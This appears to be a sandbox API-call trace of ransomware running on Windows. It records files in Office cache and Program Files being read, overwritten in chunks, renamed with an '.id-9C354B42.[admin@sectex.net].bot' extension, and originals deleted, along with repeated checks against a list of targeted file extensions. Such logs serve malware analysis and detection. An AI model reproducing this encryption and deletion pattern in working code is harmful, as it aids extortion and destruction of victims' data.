	[0049.945] WriteFile (in: hFile=0x1d0, lpBuffer=0xb442750*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb442750*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0049.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb442750 | out: hHeap=0x7d60000) returned 1
	[0049.947] CloseHandle (hObject=0x1d0) returned 1
	[0049.947] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0049.947] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.947] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.947] lstrlenW (lpString=".doc") returned 4
	[0049.947] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0049.948] lstrlenW (lpString=".docx") returned 5
	[0049.948] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0049.948] lstrlenW (lpString=".pdf") returned 4
	[0049.948] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0049.948] lstrlenW (lpString=".xls") returned 4
	[0049.948] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0049.948] lstrlenW (lpString=".xlsx") returned 5
	[0049.948] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0049.948] lstrlenW (lpString=".ppt") returned 4
	[0049.948] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0049.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.948] lstrlenW (lpString=".zip") returned 4
	[0049.948] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0049.948] lstrlenW (lpString=".rar") returned 4
	[0049.948] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0049.948] lstrlenW (lpString=".bz2") returned 4
	[0049.948] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0049.948] lstrlenW (lpString=".7z") returned 3
	[0049.948] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0049.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.948] lstrlenW (lpString=".dbf") returned 4
	[0049.948] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0049.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.948] lstrlenW (lpString=".1cd") returned 4
	[0049.948] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0049.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.948] lstrlenW (lpString=".jpg") returned 4
	[0049.948] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0049.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.948] lstrlenW (lpString=".doc") returned 4
	[0049.948] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0049.948] lstrlenW (lpString=".docx") returned 5
	[0049.948] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0049.948] lstrlenW (lpString=".pdf") returned 4
	[0049.949] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0049.949] lstrlenW (lpString=".xls") returned 4
	[0049.949] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0049.949] lstrlenW (lpString=".xlsx") returned 5
	[0049.949] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0049.949] lstrlenW (lpString=".ppt") returned 4
	[0049.949] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0049.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.949] lstrlenW (lpString=".zip") returned 4
	[0049.949] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0049.949] lstrlenW (lpString=".rar") returned 4
	[0049.949] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0049.949] lstrlenW (lpString=".bz2") returned 4
	[0049.949] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0049.949] lstrlenW (lpString=".7z") returned 3
	[0049.949] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0049.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.949] lstrlenW (lpString=".dbf") returned 4
	[0049.949] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0049.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.949] lstrlenW (lpString=".1cd") returned 4
	[0049.949] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0049.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75
	[0049.949] lstrlenW (lpString=".jpg") returned 4
	[0049.949] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0049.949] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0049.949] lstrlenW (lpString="OWOW32WW.cab") returned 12
	[0049.949] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0049.950] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=36233052) returned 1
	[0049.950] CloseHandle (hObject=0x1d0) returned 1
	[0049.950] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020
	[0049.950] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.950] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0049.951] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0049.951] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0049.951] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0049.951] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0049.956] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0049.956] ReadFile (in: hFile=0x1d0, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0049.958] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0049.959] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0049.959] ReadFile (in: hFile=0x1d0, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0049.973] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.974] WriteFile (in: hFile=0x1d0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0050.216] SetEndOfFile (hFile=0x1d0) returned 1
	[0050.216] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb442750
	[0050.220] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.220] WriteFile (in: hFile=0x1d0, lpBuffer=0xb442750*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb442750*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.326] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.326] WriteFile (in: hFile=0x1d0, lpBuffer=0xb442750*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb442750*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.327] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.327] WriteFile (in: hFile=0x1d0, lpBuffer=0xb442750*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb442750*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.329] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb442750 | out: hHeap=0x7d60000) returned 1
	[0050.329] CloseHandle (hObject=0x1d0) returned 1
	[0050.329] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0050.329] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.329] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.329] lstrlenW (lpString=".doc") returned 4
	[0050.329] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0050.329] lstrlenW (lpString=".docx") returned 5
	[0050.329] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0050.329] lstrlenW (lpString=".pdf") returned 4
	[0050.329] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0050.329] lstrlenW (lpString=".xls") returned 4
	[0050.330] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0050.330] lstrlenW (lpString=".xlsx") returned 5
	[0050.330] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0050.330] lstrlenW (lpString=".ppt") returned 4
	[0050.330] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0050.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.330] lstrlenW (lpString=".zip") returned 4
	[0050.330] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0050.330] lstrlenW (lpString=".rar") returned 4
	[0050.330] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0050.330] lstrlenW (lpString=".bz2") returned 4
	[0050.330] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0050.330] lstrlenW (lpString=".7z") returned 3
	[0050.330] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0050.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.330] lstrlenW (lpString=".dbf") returned 4
	[0050.330] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0050.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.330] lstrlenW (lpString=".1cd") returned 4
	[0050.330] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0050.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.330] lstrlenW (lpString=".jpg") returned 4
	[0050.330] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0050.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.330] lstrlenW (lpString=".doc") returned 4
	[0050.330] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0050.330] lstrlenW (lpString=".docx") returned 5
	[0050.330] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0050.330] lstrlenW (lpString=".pdf") returned 4
	[0050.330] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0050.330] lstrlenW (lpString=".xls") returned 4
	[0050.330] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0050.330] lstrlenW (lpString=".xlsx") returned 5
	[0050.330] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0050.331] lstrlenW (lpString=".ppt") returned 4
	[0050.331] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0050.331] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.331] lstrlenW (lpString=".zip") returned 4
	[0050.331] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0050.331] lstrlenW (lpString=".rar") returned 4
	[0050.331] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0050.331] lstrlenW (lpString=".bz2") returned 4
	[0050.331] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0050.331] lstrlenW (lpString=".7z") returned 3
	[0050.331] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0050.331] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.331] lstrlenW (lpString=".dbf") returned 4
	[0050.331] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0050.331] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.331] lstrlenW (lpString=".1cd") returned 4
	[0050.331] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0050.331] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0050.331] lstrlenW (lpString=".jpg") returned 4
	[0050.331] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0050.331] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0050.331] lstrlenW (lpString="setup.exe") returned 9
	[0050.331] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0050.396] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=1377656) returned 1
	[0050.396] CloseHandle (hObject=0x1a8) returned 1
	[0050.396] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020
	[0050.396] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.396] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0050.396] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.396] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.396] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0050.396] GetLastError () returned 0x0
	[0050.397] ReadFile (in: hFile=0x1a8, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0050.418] WriteFile (in: hFile=0x194, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0050.733] ReadFile (in: hFile=0x1a8, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x50588, lpOverlapped=0x0) returned 1
	[0050.745] WriteFile (in: hFile=0x194, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0x50590, lpOverlapped=0x0) returned 1
	[0050.753] ReadFile (in: hFile=0x1a8, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0050.753] WriteFile (in: hFile=0x194, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0050.753] SetEndOfFile (hFile=0x194) returned 1
	[0050.753] CloseHandle (hObject=0x194) returned 1
	[0050.754] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.754] SetEndOfFile (hFile=0x1a8) returned 1
	[0050.757] CloseHandle (hObject=0x1a8) returned 1
	[0050.757] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0050.757] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1
	[0050.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.757] lstrlenW (lpString=".doc") returned 4
	[0050.757] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0050.757] lstrlenW (lpString=".docx") returned 5
	[0050.757] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1
	[0050.757] lstrlenW (lpString=".pdf") returned 4
	[0050.757] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0050.757] lstrlenW (lpString=".xls") returned 4
	[0050.758] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0050.758] lstrlenW (lpString=".xlsx") returned 5
	[0050.758] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1
	[0050.758] lstrlenW (lpString=".ppt") returned 4
	[0050.758] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0050.758] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.758] lstrlenW (lpString=".zip") returned 4
	[0050.758] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0050.758] lstrlenW (lpString=".rar") returned 4
	[0050.758] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0050.758] lstrlenW (lpString=".bz2") returned 4
	[0050.758] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0050.758] lstrlenW (lpString=".7z") returned 3
	[0050.758] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0050.758] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.758] lstrlenW (lpString=".dbf") returned 4
	[0050.758] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0050.758] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.758] lstrlenW (lpString=".1cd") returned 4
	[0050.758] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0050.758] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.758] lstrlenW (lpString=".jpg") returned 4
	[0050.758] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0050.758] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.758] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.758] lstrlenW (lpString=".doc") returned 4
	[0050.758] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0050.758] lstrlenW (lpString=".docx") returned 5
	[0050.758] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1
	[0050.758] lstrlenW (lpString=".pdf") returned 4
	[0050.758] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0050.758] lstrlenW (lpString=".xls") returned 4
	[0050.758] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0050.758] lstrlenW (lpString=".xlsx") returned 5
	[0050.758] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1
	[0050.759] lstrlenW (lpString=".ppt") returned 4
	[0050.759] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0050.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.759] lstrlenW (lpString=".zip") returned 4
	[0050.759] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0050.759] lstrlenW (lpString=".rar") returned 4
	[0050.759] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0050.759] lstrlenW (lpString=".bz2") returned 4
	[0050.759] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0050.759] lstrlenW (lpString=".7z") returned 3
	[0050.759] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0050.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.759] lstrlenW (lpString=".dbf") returned 4
	[0050.759] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0050.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.759] lstrlenW (lpString=".1cd") returned 4
	[0050.759] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0050.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0050.759] lstrlenW (lpString=".jpg") returned 4
	[0050.759] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0050.759] lstrcmpiW (lpString1=".EXE", lpString2=".bot") returned 1
	[0050.759] lstrlenW (lpString="DW20.EXE") returned 8
	[0050.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0051.753] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=994184) returned 1
	[0051.753] CloseHandle (hObject=0x1a8) returned 1
